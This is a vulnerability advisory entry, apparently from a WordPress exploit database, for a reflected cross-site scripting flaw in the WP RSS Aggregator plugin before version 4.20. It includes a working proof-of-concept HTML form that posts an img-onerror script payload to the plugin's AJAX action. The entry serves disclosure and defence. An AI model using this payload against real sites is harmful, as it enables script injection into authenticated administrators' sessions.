Lucene search

K
wpexploitKrzysztof ZającWPEX-ID:52A71BF1-B8BC-479E-B741-EB8FB9685014
HistoryJan 26, 2022 - 12:00 a.m.

WP RSS Aggregator < 4.20 - Reflected Cross-Site Scripting (XSS)

2022-01-2600:00:00
Krzysztof Zając
370

0.001 Low

EPSS

Percentile

41.6%

The plugin does not sanitise and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to a Reflected Cross-Site Scripting

Save the HTML below to a file with the .html extension, then open it in Firefox, while being authenticated in a separate tab to a WordPress site with the plugin installed.

<html>
    <form action="http://example.com/wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action" method="POST">
        <input type="text" value="<html><img src onerror=alert(`XSS`)>" name="id">
        <input type="submit" value="Send">
    </form>
</html>

0.001 Low

EPSS

Percentile

41.6%

Related for WPEX-ID:52A71BF1-B8BC-479E-B741-EB8FB9685014